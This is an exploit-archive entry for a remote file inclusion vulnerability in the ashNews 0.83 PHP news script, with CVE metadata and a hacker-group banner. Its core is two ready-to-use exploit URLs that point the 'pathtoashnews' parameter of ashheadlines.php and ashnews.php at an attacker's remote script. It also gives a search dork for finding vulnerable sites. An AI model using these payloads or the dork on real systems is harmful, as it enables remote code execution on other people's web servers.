ashNews 0.83 - 'pathtoashnews' Remote File Inclusion

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2006-06-01 
date_updated:  
verified: 1 
codes: OSVDB-26609;CVE-2003-1292;OSVDB-22912 
tags: 
aliases:  
screenshot_url:  
application_url: 

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
# Script site: http://dev.ashwebstudio.com/
# dork: News powered by ashnews
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]

http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-06-02]